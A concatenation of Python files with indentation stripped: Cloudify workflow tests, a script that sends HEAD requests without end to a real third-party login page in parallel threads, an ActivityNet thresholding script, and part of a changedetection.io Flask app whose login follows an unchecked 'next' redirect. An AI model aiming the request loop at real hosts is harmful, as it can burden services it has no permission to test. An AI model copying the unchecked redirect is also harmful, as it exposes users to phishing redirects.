sequence.add(instance.execute_operation('test.op2'))
sequence.add(instance.execute_operation('test.op1'))
sequence.add(instance.execute_operation('test.op0'))
graph.execute()
def op0(ctx, **_):
invocation = ctx.instance.runtime_properties['invocation']
self.assertEqual(2, invocation)
def op1(ctx, **_):
invocation = ctx.instance.runtime_properties['invocation']
self.assertEqual(1, invocation)
ctx.instance.runtime_properties['invocation'] += 1
def op2(ctx, **_):
invocation = ctx.instance.runtime_properties.get('invocation')
self.assertIsNone(invocation)
ctx.instance.runtime_properties['invocation'] = 1
self._execute_workflow(flow, operation_methods=[op0, op1, op2])
def test_node_instance_version_conflict(self):
def flow(ctx, **_):
pass
# stub to get a properly initialized storage instance
self._execute_workflow(flow)
storage = self.env.storage
instance = storage.get_node_instances()[0]
storage.update_node_instance(
instance.id,
runtime_properties={},
state=instance.state,
version=instance.version)
instance_id = instance.id
exception = Queue.Queue()
done = Queue.Queue()
def proceed():
try:
done.get_nowait()
return False
except Queue.Empty:
return True
def publisher(key, value):
def func():
timeout = time.time() + 5
while time.time() < timeout and proceed():
p_instance = storage.get_node_instance(instance_id)
p_instance.runtime_properties[key] = value
try:
storage.update_node_instance(
p_instance.id,
runtime_properties=p_instance.runtime_properties,
state=p_instance.state,
version=p_instance.version)
except local.StorageConflictError, e:
exception.put(e)
done.put(True)
return
return func
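        # The two publisher threads below race to update the same node instance;
        # local storage enforces optimistic versioning, so one of them must hit
        # StorageConflictError, which the assertion at the end checks for.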
publisher1 = publisher('publisher1', 'value1')
publisher2 = publisher('publisher2', 'value2')
publisher1_thread = threading.Thread(target=publisher1)
publisher2_thread = threading.Thread(target=publisher2)
publisher1_thread.daemon = True
publisher2_thread.daemon = True
publisher1_thread.start()
publisher2_thread.start()
publisher1_thread.join()
publisher2_thread.join()
conflict_error = exception.get_nowait()
self.assertIn('does not match current', conflict_error.message)
def test_get_node(self):
def flow(ctx, **_):
pass
# stub to get a properly initialized storage instance
self._execute_workflow(flow)
storage = self.env.storage
node = storage.get_node('node')
self.assertEqual(node.properties['property'], 'value')
def test_get_node_missing(self):
def flow(ctx, **_):
pass
# stub to get a properly initialized storage instance
self._execute_workflow(flow)
storage = self.env.storage
self.assertRaises(RuntimeError,
storage.get_node, 'node_that_does_not_exist')
def test_execute_non_existent_operation(self):
def flow(ctx, **_):
instance = _instance(ctx, 'node')
instance.execute_operation('non_existent')
with testtools.testcase.ExpectedException(RuntimeError,
".*does not exist.*"):
self._execute_workflow(flow)
def test_operation_retry_configuration(self):
self._test_retry_configuration_impl(
global_retries=100,
global_retry_interval=100,
operation_retries=1,
operation_retry_interval=1
)
class LocalWorkflowTestInMemoryStorage(LocalWorkflowTest, testtools.TestCase):
def setUp(self):
super(LocalWorkflowTestInMemoryStorage, self).setUp()
self.storage_cls = local.InMemoryStorage
class LocalWorkflowTestFileStorage(LocalWorkflowTest, testtools.TestCase):
def setUp(self):
super(LocalWorkflowTestFileStorage, self).setUp()
self.storage_cls = local.FileStorage
self.storage_kwargs = {'storage_dir': self.storage_dir}
class FileStorageTest(BaseWorkflowTest, testtools.TestCase):
def setUp(self):
super(FileStorageTest, self).setUp()
self.storage_cls = local.FileStorage
self.storage_kwargs = {'storage_dir': self.storage_dir}
def test_storage_dir(self):
def stub_workflow(ctx, **_):
pass
self._execute_workflow(stub_workflow, name=self._testMethodName)
self.assertTrue(os.path.isdir(
os.path.join(self.storage_dir, self._testMethodName)))
def test_persistency(self):
bootstrap_context = {'stub': 'prop'}
provider_context = {'cloudify': bootstrap_context}
def persistency_1(ctx, **_):
instance = _instance(ctx, 'node')
instance.set_state('persistency')
instance.execute_operation('test.op0').get()
def persistency_2(ctx, **_):
instance = _instance(ctx, 'node')
self.assertEqual('persistency', instance.get_state().get())
instance.execute_operation('test.op0').get()
def op(ctx, **_):
self.assertEqual('new_input', ctx.node.properties['from_input'])
self.assertEqual('content', ctx.get_resource('resource'))
self.assertEqual(bootstrap_context,
ctx.bootstrap_context._bootstrap_context)
self.assertEqual(provider_context, ctx.provider_context)
self._setup_env(workflow_methods=[persistency_1, persistency_2],
operation_methods=[op],
inputs={'from_input': 'new_input'},
provider_context=provider_context)
self._execute_workflow(workflow_name='workflow0',
setup_env=False, load_env=True)
self._execute_workflow(workflow_name='workflow1',
setup_env=False, load_env=True)
def test_path_agnostic_persistency(self):
# tests file storage isn't dependent on the blueprint directory
# for resources (but stores its own copies instead)
def persistency(ctx, **_):
instance = _instance(ctx, 'node')
instance.execute_operation('test.op0').get()
def op(ctx, **_):
self.assertEqual('new_input', ctx.node.properties['from_input'])
self.assertEqual('content', ctx.get_resource('resource'))
self._setup_env(workflow_methods=[persistency],
operation_methods=[op],
inputs={'from_input': 'new_input'})
shutil.rmtree(self.blueprint_dir)
self._execute_workflow(workflow_name='workflow0',
setup_env=False, load_env=True)
def test_local_init_in_blueprint_dir(self):
self.blueprint_dir = self.storage_dir
def flow(ctx, **_):
pass
self._setup_env(workflow_methods=[flow])
def test_workdir(self):
content = 'CONTENT'
def op0(ctx, **_):
self.assertEquals(
ctx.plugin.workdir,
os.path.join(self.storage_dir, self._testMethodName,
'workdir', 'plugins', 'p'))
work_file = os.path.join(ctx.plugin.workdir, 'work_file')
self.assertFalse(os.path.exists(work_file))
with open(work_file, 'w') as f:
f.write(content)
def op1(ctx, **_):
work_file = os.path.join(ctx.plugin.workdir, 'work_file')
with open(work_file) as f:
print work_file
self.assertEqual(content, f.read())
def workflow1(ctx, **_):
instance = _instance(ctx, 'node')
instance.execute_operation('test.op0').get()
def workflow2(ctx, **_):
instance = _instance(ctx, 'node')
instance.execute_operation('test.op1').get()
self._setup_env(workflow_methods=[workflow1, workflow2],
operation_methods=[op0, op1])
self._execute_workflow(workflow_name='workflow0',
setup_env=False, load_env=True)
self._execute_workflow(workflow_name='workflow1',
setup_env=False, load_env=True)
class LocalWorkflowEnvironmentTest(BaseWorkflowTest, testtools.TestCase):
def setUp(self):
super(LocalWorkflowEnvironmentTest, self).setUp()
self.storage_cls = local.InMemoryStorage
def test_inputs(self):
def op(ctx, **_):
self.assertEqual('new_input', ctx.node.properties['from_input'])
self._execute_workflow(operation_methods=[op],
inputs={'from_input': 'new_input'})
def test_outputs(self):
def op(ctx, **_):
pass
self._execute_workflow(operation_methods=[op],
use_existing_env=False)
self.assertEqual(self.env.outputs(),
{'some_output': None, 'static': 'value'})
def op(ctx, **_):
ctx.instance.runtime_properties['some_output'] = 'value'
self._execute_workflow(operation_methods=[op],
use_existing_env=False)
self.assertEqual(self.env.outputs(),
{'some_output': 'value', 'static': 'value'})
def test_workflow_return_value(self):
def flow(ctx, **_):
return 1
self.assertEqual(1, self._execute_workflow(flow))
def test_blueprint_imports(self):
def flow(ctx, **_):
node = ctx.get_node('node5')
self.assertEqual('imported_type', node.type)
self._execute_workflow(flow)
def test_workflow_parameters(self):
normal_schema = {
'from_invocation': {},
'from_default': {
'default': 'from_default_default'
},
'invocation_overrides_default': {
'default': 'invocation_overrides_default_default'
}
}
normal_execute_kwargs = {
'parameters': {
'from_invocation': 'from_invocation',
'invocation_overrides_default':
'invocation_overrides_default_override'
}
}
def normal_flow(ctx,
from_invocation,
from_default,
invocation_overrides_default,
**_):
self.assertEqual(from_invocation, 'from_invocation')
self.assertEqual(from_default, 'from_default_default')
self.assertEqual(invocation_overrides_default,
'invocation_overrides_default_override')
self._execute_workflow(normal_flow,
execute_kwargs=normal_execute_kwargs,
workflow_parameters_schema=normal_schema,
use_existing_env=False)
# now test missing
missing_schema = normal_schema.copy()
missing_schema['missing_parameter'] = {}
missing_flow = normal_flow
missing_execute_kwargs = normal_execute_kwargs
self.assertRaises(ValueError,
self._execute_workflow,
missing_flow,
execute_kwargs=missing_execute_kwargs,
workflow_parameters_schema=missing_schema,
use_existing_env=False)
# now test invalid custom parameters
invalid_custom_schema = normal_schema
invalid_custom_flow = normal_flow
invalid_custom_kwargs = normal_execute_kwargs.copy()
invalid_custom_kwargs['parameters']['custom_parameter'] = 'custom'
self.assertRaises(ValueError,
self._execute_workflow,
invalid_custom_flow,
execute_kwargs=invalid_custom_kwargs,
workflow_parameters_schema=invalid_custom_schema,
use_existing_env=False)
# now test valid custom parameters
def valid_custom_flow(ctx,
from_invocation,
from_default,
invocation_overrides_default,
custom_parameter,
**_):
self.assertEqual(from_invocation, 'from_invocation')
self.assertEqual(from_default, 'from_default_default')
self.assertEqual(invocation_overrides_default,
'invocation_overrides_default_override')
self.assertEqual(custom_parameter, 'custom')
valid_custom_schema = normal_schema
valid_custom_kwargs = normal_execute_kwargs.copy()
valid_custom_kwargs['parameters']['custom_parameter'] = 'custom'
valid_custom_kwargs['allow_custom_parameters'] = True
self._execute_workflow(
valid_custom_flow,
execute_kwargs=valid_custom_kwargs,
workflow_parameters_schema=valid_custom_schema,
use_existing_env=False)
def test_workflow_parameters_types(self):
workflow = {
'parameters': {
'optional1': {'default': 7},
'optional2': {'default': 'bla'},
'optional_int1': {
'default': 1,
'type': 'integer'
},
'optional_int2': {
'default': 2,
'type': 'integer'
},
'optional_float1': {
'default': 1.5,
'type': 'float'
},
'optional_float2': {
'default': 2,
'type': 'float'
},
'optional_str1': {
'default': 'bla',
'type': 'string'
},
'optional_str2': {
'default': 'blabla',
'type': 'string'
},
'optional_bool1': {
'default': 'False',
'type': 'boolean'
},
'optional_bool2': {
'default': 'True',
'type': 'boolean'
},
'mandatory1': {},
'mandatory2': {},
'mandatory_int1': {'type': 'integer'},
'mandatory_int2': {'type': 'integer'},
'mandatory_float1': {'type': 'float'},
'mandatory_float2': {'type': 'float'},
'mandatory_str1': {'type': 'string'},
'mandatory_str2': {'type': 'string'},
'mandatory_bool1': {'type': 'boolean'},
'mandatory_bool2': {'type': 'boolean'}
}
}
self._test_workflow_mandatory_parameters_types(workflow)
self._test_workflow_optional_parameters_types(workflow)
self._test_workflow_custom_parameters_types(workflow)
def _test_workflow_mandatory_parameters_types(self, workflow):
parameters = {
'mandatory1': 'bla',
'mandatory2': 6,
'mandatory_int1': 1,
'mandatory_int2': 'bla',
'mandatory_float1': 3.5,
'mandatory_float2': True,
'mandatory_str1': 'bla',
'mandatory_str2': 7,
'mandatory_bool1': False,
'mandatory_bool2': 'boolean_that_is_not_string'
}
try:
local._merge_and_validate_execution_parameters(
workflow, 'workflow', parameters)
except ValueError, e:
# check which parameters are mentioned in the error message
self.assertIn('mandatory_int2', str(e))
self.assertIn('mandatory_float2', str(e))
self.assertIn('mandatory_str2', str(e))
self.assertIn('mandatory_bool2', str(e))
self.assertNotIn('mandatory1', str(e))
self.assertNotIn('mandatory2', str(e))
self.assertNotIn('mandatory_int1', str(e))
self.assertNotIn('mandatory_float1', str(e))
self.assertNotIn('mandatory_str1', str(e))
self.assertNotIn('mandatory_bool1', str(e))
else:
self.fail()
def _test_workflow_optional_parameters_types(self, workflow):
parameters = {
'mandatory1': False,
'mandatory2': [],
'mandatory_int1': '-7',
'mandatory_int2': 3.5,
'mandatory_float1': '5.0',
'mandatory_float2': [],
'mandatory_str1': u'bla',
'mandatory_str2': ['bla'],
'mandatory_bool1': 'tRUe',
'mandatory_bool2': 0,
'optional1': 'bla',
'optional2': 6,
'optional_int1': 1,
'optional_int2': 'bla',
'optional_float1': 3.5,
'optional_float2': True,
'optional_str1': 'bla',
'optional_str2': 7,
'optional_bool1': False,
'optional_bool2': 'bla'
}
try:
local._merge_and_validate_execution_parameters(
workflow, 'workflow', parameters)
except ValueError, e:
# check which parameters are mentioned in the error message
self.assertIn('mandatory_int2', str(e))
self.assertIn('mandatory_float2', str(e))
self.assertIn('mandatory_str2', str(e))
self.assertIn('mandatory_bool2', str(e))
self.assertNotIn('mandatory1', str(e))
self.assertNotIn('mandatory2', str(e))
self.assertNotIn('mandatory_int1', str(e))
self.assertNotIn('mandatory_float1', str(e))
self.assertNotIn('mandatory_str1', str(e))
self.assertNotIn('mandatory_bool1', str(e))
self.assertIn('optional_int2', str(e))
self.assertIn('optional_float2', str(e))
self.assertIn('optional_str2', str(e))
self.assertIn('optional_bool2', str(e))
self.assertNotIn('optional1', str(e))
self.assertNotIn('optional2', str(e))
self.assertNotIn('optional_int1', str(e))
self.assertNotIn('optional_float1', str(e))
self.assertNotIn('optional_str1', str(e))
self.assertNotIn('optional_bool1', str(e))
else:
self.fail()
def _test_workflow_custom_parameters_types(self, workflow):
parameters = {
'mandatory1': False,
'mandatory2': [],
'mandatory_int1': -7,
'mandatory_int2': 3,
'mandatory_float1': 5.0,
'mandatory_float2': 0.0,
'mandatory_str1': u'bla',
'mandatory_str2': 'bla',
'mandatory_bool1': True,
'mandatory_bool2': False,
'optional1': 'bla',
'optional2': 6,
'optional_int1': 1,
'optional_int2': 'bla',
'optional_float1': 3.5,
'optional_str1': 'bla',
'optional_bool1': 'falSE',
'custom1': 8,
'custom2': 3.2,
'custom3': 'bla',
'custom4': True
}
try:
local._merge_and_validate_execution_parameters(
workflow, 'workflow', parameters, True)
except ValueError, e:
# check which parameters are mentioned in the error message
self.assertNotIn('mandatory_int2', str(e))
self.assertNotIn('mandatory_float2', str(e))
self.assertNotIn('mandatory_str2', str(e))
self.assertNotIn('mandatory_bool2', str(e))
self.assertNotIn('mandatory1', str(e))
self.assertNotIn('mandatory2', str(e))
self.assertNotIn('mandatory_int1', str(e))
self.assertNotIn('mandatory_float1', str(e))
self.assertNotIn('mandatory_str1', str(e))
self.assertNotIn('mandatory_bool1', str(e))
self.assertIn('optional_int2', str(e))
self.assertNotIn('optional_float2', str(e))
self.assertNotIn('optional_str2', str(e))
self.assertNotIn('optional_bool2', str(e))
self.assertNotIn('optional1', str(e))
self.assertNotIn('optional2', str(e))
self.assertNotIn('optional_int1', str(e))
self.assertNotIn('optional_float1', str(e))
self.assertNotIn('optional_str1', str(e))
self.assertNotIn('optional_bool1', str(e))
self.assertNotIn('custom1', str(e))
self.assertNotIn('custom2', str(e))
self.assertNotIn('custom3', str(e))
self.assertNotIn('custom4', str(e))
else:
self.fail()
def test_global_retry_configuration(self):
self._test_retry_configuration_impl(
global_retries=1,
global_retry_interval=1,
operation_retries=None,
operation_retry_interval=None
)
def test_local_task_thread_pool_size(self):
default_size = workflow_context.DEFAULT_LOCAL_TASK_THREAD_POOL_SIZE
def flow(ctx, **_):
task_processor = ctx.internal.local_tasks_processor
self.assertEqual(len(task_processor._local_task_processing_pool),
default_size)
self._execute_workflow(
flow,
use_existing_env=False)
def flow(ctx, **_):
task_processor = ctx.internal.local_tasks_processor
self.assertEqual(len(task_processor._local_task_processing_pool),
default_size + 1)
self._execute_workflow(
flow,
execute_kwargs={'task_thread_pool_size': default_size + 1},
use_existing_env=False)
def test_no_operation_module(self):
self._no_module_or_attribute_test(
is_missing_module=True,
test_type='operation')
def test_no_operation_module_ignored(self):
def op1(ctx, **_):
pass
self._execute_workflow(operation_methods=[op1],
ignored_modules=['ignored_module'])
def test_no_operation_attribute(self):
self._no_module_or_attribute_test(
is_missing_module=False,
test_type='operation')
def test_no_source_operation_module(self):
self._no_module_or_attribute_test(
is_missing_module=True,
test_type='source')
def test_no_source_operation_attribute(self):
self._no_module_or_attribute_test(
is_missing_module=False,
test_type='source')
def test_no_target_operation_module(self):
self._no_module_or_attribute_test(
is_missing_module=True,
test_type='target')
def test_no_target_operation_attribute(self):
self._no_module_or_attribute_test(
is_missing_module=False,
test_type='target')
def test_no_workflow_module(self):
self._no_module_or_attribute_test(
is_missing_module=True,
test_type='workflow')
def test_no_workflow_attribute(self):
self._no_module_or_attribute_test(
is_missing_module=False,
test_type='workflow')
def test_no_workflow(self):
try:
self._execute_workflow(workflow_name='does_not_exist')
self.fail()
except ValueError, e:
self.assertIn("['workflow0']", e.message)
def test_getting_contained_elements(self):
def check_subgraph(ctx, **_):
node_host = _instance(ctx, 'node_host')
node = _instance(ctx, 'node')
node2 = _instance(ctx, 'node2')
node3 = _instance(ctx, 'node3')
node4 = _instance(ctx, 'node4')
full_contained_subgraph = set([
node_host,
node,
node2,
node3,
node4
])
self.assertEqual(
full_contained_subgraph,
node_host.get_contained_subgraph()
)
half_subgraph = set([
node,
node2
])
self.assertEqual(
half_subgraph,
node2.get_contained_subgraph()
)
host_contained_instances = set([
node2,
node3
])
self.assertEqual(
host_contained_instances,
set(node_host.contained_instances)
)
self.assertEqual(
[],
node.contained_instances
)
self._execute_workflow(
check_subgraph,
create_blueprint_func=self._blueprint_3
)
def _no_module_or_attribute_test(self, is_missing_module, test_type):
try:
self._execute_workflow(
create_blueprint_func=self._blueprint_2(is_missing_module,
test_type),
workflow_name='workflow')
self.fail()
except (ImportError, AttributeError, NonRecoverableError) as e:
if is_missing_module:
self.assertIn('No module named zzz', e.message)
if test_type != 'workflow':
self.assertIn(test_type, e.message)
self.assertTrue(isinstance(e, ImportError))
else:
if test_type == 'workflow':
thing1 = 'function'
thing2 = ' named'
else:
thing1 = 'attribute'
thing2 = ''
self.assertIn("has no {0}{1} 'does_not_exist'".format(thing1,
thing2),
e.message)
if test_type != 'workflow':
self.assertIn(test_type, e.message)
self.assertTrue(isinstance(e, AttributeError))
def _blueprint_2(self,
is_missing_module,
test_type):
def func(*_):
module_name = 'zzz' if is_missing_module else self._testMethodName
interfaces = {
'test': {
'op': 'p.{0}.{1}'.format(module_name, 'does_not_exist')
}
}
blueprint = {
'tosca_definitions_version': 'cloudify_dsl_1_0',
'plugins': {
'p': {
'executor': 'central_deployment_agent',
'install': False
}
},
'node_types': {
'type': {}
},
'relationships': {
'cloudify.relationships.contained_in': {}
},
'node_templates': {
'node2': {
'type': 'type',
},
'node': {
'type': 'type',
'relationships': [{
'target': 'node2',
'type': 'cloudify.relationships.contained_in',
}]
},
},
'workflows': {
'workflow': 'p.{0}.{1}'.format(module_name,
'does_not_exist')
}
}
node = blueprint['node_templates']['node']
relationship = node['relationships'][0]
if test_type == 'operation':
node['interfaces'] = interfaces
elif test_type == 'source':
relationship['source_interfaces'] = interfaces
elif test_type == 'target':
relationship['target_interfaces'] = interfaces
elif test_type == 'workflow':
pass
else:
self.fail('unsupported: {}'.format(test_type))
return blueprint
return func
def _blueprint_3(self, workflow_methods, _,
workflow_parameters_schema, __, *args):
workflows = dict((
('workflow{0}'.format(index), {
'mapping': 'p.{0}.{1}'.format(self._testMethodName,
w_method.__name__),
'parameters': workflow_parameters_schema or {}
}) for index, w_method in enumerate(workflow_methods)
))
blueprint = {
'tosca_definitions_version': 'cloudify_dsl_1_0',
'plugins': {
'p': {
'executor': 'central_deployment_agent',
'install': False
}
},
'node_types': {
'type': {},
},
'relationships': {
'cloudify.relationships.contained_in': {}
},
'node_templates': {
'node_host': {
'type': 'type'
},
'node4': {
'type': 'type',
'relationships': [{
'target': 'node3',
'type': 'cloudify.relationships.contained_in',
}]
},
'node3': {
'type': 'type',
'relationships': [{
'target': 'node_host',
'type': 'cloudify.relationships.contained_in',
}]
},
'node2': {
'type': 'type',
'relationships': [{
'target': 'node_host',
'type': 'cloudify.relationships.contained_in',
}]
},
'node': {
'type': 'type',
'relationships': [{
'target': 'node2',
'type': 'cloudify.relationships.contained_in',
}]
},
'outside_node': {
'type': 'type'
}
},
'workflows': workflows
}
return blueprint
def _instance(ctx, node_name):
return next(ctx.get_node(node_name).instances)
|
test_http_request.py
|
__author__ = 'wenjusun'
from httplib import HTTPConnection
from httplib import HTTPSConnection
import threading
import time
import sys
def download(host,path):
common_httpreq(HTTPConnection(host),path)
def https_download(host,path):
common_httpreq(HTTPSConnection(host),path)
def common_httpreq(httpcon,path):
while True:
httpcon.connect()
httpcon.request('HEAD',path)
resp = httpcon.getresponse()
if(resp.status != 200):
print "Failed: %d,%s" % (resp.status,resp.reason)
time.sleep(10)
httpcon.close()
def get_current_time_inmills():
return int(round(time.time()*1000))
if __name__ == '__main__':
#https://accounts.motorola.com.cn/ssoauth/login
host = 'accounts.motorola.com.cn'
path = '/ssoauth/login'
LOOPS=1
"""
print sys.argv
if sys.argv:
if len(sys.argv) == 4:
host = sys.argv[1]
path = sys.argv[2]
LOOPS = int(sys.argv[3])
else:
print "Please both input host and path,loops "
exit(0)
else:
print "Please input host and path,loops "
exit(0)
"""
print time.ctime()
start_time_inmills = get_current_time_inmills()
thread_list=[]
for i in range(0,LOOPS):
        # t = threading.Thread(target=download, args=(host, path))
        t = threading.Thread(target=https_download, args=(host, path))
thread_list.append(t)
for t in thread_list:
t.start()
pass
for t in thread_list:
t.join()
pass
print time.ctime()
print "total cost:%d seconds" % (get_current_time_inmills()-start_time_inmills)
|
threshold.py
|
import os
import numpy as np
import json
from AFSD.common.anet_dataset import load_json
from AFSD.common.config import config
from test import get_basic_config, inference_thread
import multiprocessing as mp
import threading
def compute_threshold(result_dict, scoring='confidence'):
all_scores = []
for vid, proposal_list in result_dict.items():
for prop in proposal_list:
if scoring == 'uncertainty':
ood_score = 1 - prop['uncertainty']
elif scoring == 'confidence':
ood_score = prop['score']
elif scoring == 'uncertainty_actionness':
ood_score = 1 - prop['uncertainty'] * prop['actionness']
all_scores.append(ood_score)
    score_sorted = np.sort(all_scores)  # sort the confidence scores in increasing order
N = len(all_scores)
topK = N - int(N * 0.95)
threshold = score_sorted[topK-1]
return threshold
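# Hedged worked example (not part of the original code): with 100 scores,
# topK = 100 - int(100 * 0.95) = 5, so the threshold is the 5th smallest score
# and roughly 95% of the training scores lie above it. The fake proposal
# scores below are illustrative only.
def _compute_threshold_example():
    fake_results = {'v_demo': [{'score': s / 100.0} for s in range(1, 101)]}
    return compute_threshold(fake_results, scoring='confidence')  # -> 0.05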
def thresholding(cfg, output_file, thread_num=1):
processes = []
lock = threading.Lock()
train_cls_data = load_json('datasets/activitynet/result_tsn_train.json')
videos_in_clsdata = ['v_' + name for name in list(train_cls_data['results'].keys())]
videos_in_annodata = list(cfg.video_infos.keys())
video_list = list(set(videos_in_clsdata) & set(videos_in_annodata))
video_num = len(video_list)
per_thread_video_num = video_num // thread_num
result_dict = mp.Manager().dict()
for i in range(thread_num):
if i == thread_num - 1:
sub_video_list = video_list[i * per_thread_video_num:]
else:
sub_video_list = video_list[i * per_thread_video_num: (i + 1) * per_thread_video_num]
# inference_thread(lock, i, sub_video_list, train_cls_data, cfg)
p = mp.Process(target=inference_thread, args=(lock, i, sub_video_list, train_cls_data, cfg, result_dict))
p.start()
processes.append(p)
for p in processes:
p.join()
# compute threshold value
threshold = compute_threshold(result_dict, scoring=cfg.scoring)
output_dict = {"version": "ActivityNet-v1.3", "results": dict(result_dict), "external_data": {'threshold': threshold}}
with open(output_file, "w") as out:
json.dump(output_dict, out)
return threshold
def main():
cfg = get_basic_config(config, dataset='training')
output_file = os.path.join(cfg.output_path, cfg.json_name)
if not os.path.exists(output_file):
threshold = thresholding(cfg, output_file, thread_num=cfg.thread_num)
else:
with open(output_file, 'r') as fobj:
data = json.load(fobj)
threshold = data['external_data']['threshold']
print(f'Thresholding result file already exist at {output_file}!')
print(f'The threshold is: {threshold:.12f}')
if __name__ == '__main__':
# keep all things private in this file
main()
|
__init__.py
|
#!/usr/bin/python3
# @todo logging
# @todo extra options for url like , verify=False etc.
# @todo enable https://urllib3.readthedocs.io/en/latest/user-guide.html#ssl as option?
# @todo option for interval day/6 hour/etc
# @todo on change detected, config for calling some API
# @todo fetch title into json
# https://distill.io/features
# proxy per check
# - flask_cors, itsdangerous,MarkupSafe
import time
import os
import timeago
import flask_login
from flask_login import login_required
import threading
from threading import Event
import queue
from flask import Flask, render_template, request, send_from_directory, abort, redirect, url_for, flash
from feedgen.feed import FeedGenerator
from flask import make_response
import datetime
import pytz
datastore = None
# Local
running_update_threads = []
ticker_thread = None
extra_stylesheets = []
update_q = queue.Queue()
notification_q = queue.Queue()
app = Flask(__name__, static_url_path="/var/www/change-detection/backend/static")
# Stop browser caching of assets
app.config['SEND_FILE_MAX_AGE_DEFAULT'] = 0
app.config.exit = Event()
app.config['NEW_VERSION_AVAILABLE'] = False
app.config['LOGIN_DISABLED'] = False
#app.config["EXPLAIN_TEMPLATE_LOADING"] = True
# Disables caching of the templates
app.config['TEMPLATES_AUTO_RELOAD'] = True
def init_app_secret(datastore_path):
secret = ""
path = "{}/secret.txt".format(datastore_path)
try:
with open(path, "r") as f:
secret = f.read()
except FileNotFoundError:
import secrets
with open(path, "w") as f:
secret = secrets.token_hex(32)
f.write(secret)
return secret
# Remember python passes objects by reference
# populate_form in wtforms didn't work for me (try using a setattr() obj type on datastore.watch?)
def populate_form_from_watch(form, watch):
for i in form.__dict__.keys():
if i[0] != '_':
p = getattr(form, i)
if hasattr(p, 'data') and i in watch:
if not p.data:
setattr(p, "data", watch[i])
# We use the whole watch object from the store/JSON so we can see if there's some related status in terms of a thread
# running or something similar.
@app.template_filter('format_last_checked_time')
def _jinja2_filter_datetime(watch_obj, format="%Y-%m-%d %H:%M:%S"):
# Worker thread tells us which UUID it is currently processing.
for t in running_update_threads:
if t.current_uuid == watch_obj['uuid']:
return "Checking now.."
if watch_obj['last_checked'] == 0:
return 'Not yet'
return timeago.format(int(watch_obj['last_checked']), time.time())
# @app.context_processor
# def timeago():
# def _timeago(lower_time, now):
# return timeago.format(lower_time, now)
# return dict(timeago=_timeago)
@app.template_filter('format_timestamp_timeago')
def _jinja2_filter_datetimestamp(timestamp, format="%Y-%m-%d %H:%M:%S"):
return timeago.format(timestamp, time.time())
# return timeago.format(timestamp, time.time())
# return datetime.datetime.utcfromtimestamp(timestamp).strftime(format)
class User(flask_login.UserMixin):
id=None
def set_password(self, password):
return True
def get_user(self, email="defaultuser@changedetection.io"):
return self
def is_authenticated(self):
return True
def is_active(self):
return True
def is_anonymous(self):
return False
def get_id(self):
return str(self.id)
def check_password(self, password):
import hashlib
import base64
# Getting the values back out
raw_salt_pass = base64.b64decode(datastore.data['settings']['application']['password'])
salt_from_storage = raw_salt_pass[:32] # 32 is the length of the salt
# Use the exact same setup you used to generate the key, but this time put in the password to check
new_key = hashlib.pbkdf2_hmac(
'sha256',
password.encode('utf-8'), # Convert the password to bytes
salt_from_storage,
100000
)
new_key = salt_from_storage + new_key
return new_key == raw_salt_pass
pass
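# Hedged sketch (not part of the original code): how a stored password value in
# the format expected by User.check_password() above could be produced - 32
# random salt bytes, PBKDF2-HMAC-SHA256 with 100,000 iterations, then base64 of
# salt + derived key. The helper name is illustrative only.
def _generate_password_hash_example(password):
    import base64
    import hashlib
    salt = os.urandom(32)
    key = hashlib.pbkdf2_hmac('sha256', password.encode('utf-8'), salt, 100000)
    return base64.b64encode(salt + key)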
def changedetection_app(config=None, datastore_o=None):
global datastore
datastore = datastore_o
app.config.update(dict(DEBUG=True))
#app.config.update(config or {})
login_manager = flask_login.LoginManager(app)
login_manager.login_view = 'login'
app.secret_key = init_app_secret(config['datastore_path'])
# Setup cors headers to allow all domains
# https://flask-cors.readthedocs.io/en/latest/
# CORS(app)
@login_manager.user_loader
def user_loader(email):
user = User()
user.get_user(email)
return user
@login_manager.unauthorized_handler
def unauthorized_handler():
# @todo validate its a URL of this host and use that
return redirect(url_for('login', next=url_for('index')))
@app.route('/logout')
def logout():
flask_login.logout_user()
return redirect(url_for('index'))
# https://github.com/pallets/flask/blob/93dd1709d05a1cf0e886df6223377bdab3b077fb/examples/tutorial/flaskr/__init__.py#L39
# You can divide up the stuff like this
@app.route('/login', methods=['GET', 'POST'])
def login():
if not datastore.data['settings']['application']['password']:
flash("Login not required, no password enabled.", "notice")
return redirect(url_for('index'))
if request.method == 'GET':
output = render_template("login.html")
return output
user = User()
user.id = "defaultuser@changedetection.io"
password = request.form.get('password')
if (user.check_password(password)):
flask_login.login_user(user, remember=True)
next = request.args.get('next')
# if not is_safe_url(next):
# return flask.abort(400)
return redirect(next or url_for('index'))
else:
flash('Incorrect password', 'error')
return redirect(url_for('login'))
@app.before_request
def do_something_whenever_a_request_comes_in():
        # Disable password login if there is no password set
app.config['LOGIN_DISABLED'] = datastore.data['settings']['application']['password'] == False
@app.route("/", methods=['GET'])
@login_required
def index():
limit_tag = request.args.get('tag')
pause_uuid = request.args.get('pause')
if pause_uuid:
try:
datastore.data['watching'][pause_uuid]['paused'] ^= True
datastore.needs_write = True
return redirect(url_for('index', tag = limit_tag))
except KeyError:
pass
# Sort by last_changed and add the uuid which is usually the key..
sorted_watches = []
for uuid, watch in datastore.data['watching'].items():
if limit_tag != None:
# Support for comma separated list of tags.
for tag_in_watch in watch['tag'].split(','):
tag_in_watch = tag_in_watch.strip()
if tag_in_watch == limit_tag:
watch['uuid'] = uuid
sorted_watches.append(watch)
else:
watch['uuid'] = uuid
sorted_watches.append(watch)
sorted_watches.sort(key=lambda x: x['last_changed'], reverse=True)
existing_tags = datastore.get_all_tags()
rss = request.args.get('rss')
if rss:
fg = FeedGenerator()
fg.title('changedetection.io')
fg.description('Feed description')
fg.link(href='https://changedetection.io')
for watch in sorted_watches:
if not watch['viewed']:
fe = fg.add_entry()
fe.title(watch['url'])
fe.link(href=watch['url'])
fe.description(watch['url'])
fe.guid(watch['uuid'], permalink=False)
dt = datetime.datetime.fromtimestamp(int(watch['newest_history_key']))
dt = dt.replace(tzinfo=pytz.UTC)
fe.pubDate(dt)
response = make_response(fg.rss_str())
response.headers.set('Content-Type', 'application/rss+xml')
return response
else:
from backend import forms
form = forms.quickWatchForm(request.form)
output = render_template("watch-overview.html",
form=form,
watches=sorted_watches,
tags=existing_tags,
active_tag=limit_tag,
has_unviewed=datastore.data['has_unviewed'])
return output
@app.route("/scrub", methods=['GET', 'POST'])
@login_required
def scrub_page():
import re
if request.method == 'POST':
confirmtext = request.form.get('confirmtext')
limit_date = request.form.get('limit_date')
limit_timestamp = 0
# Re #149 - allow empty/0 timestamp limit
if len(limit_date):
try:
limit_date = limit_date.replace('T', ' ')
# I noticed chrome will show '/' but actually submit '-'
limit_date = limit_date.replace('-', '/')
# In the case that :ss seconds are supplied
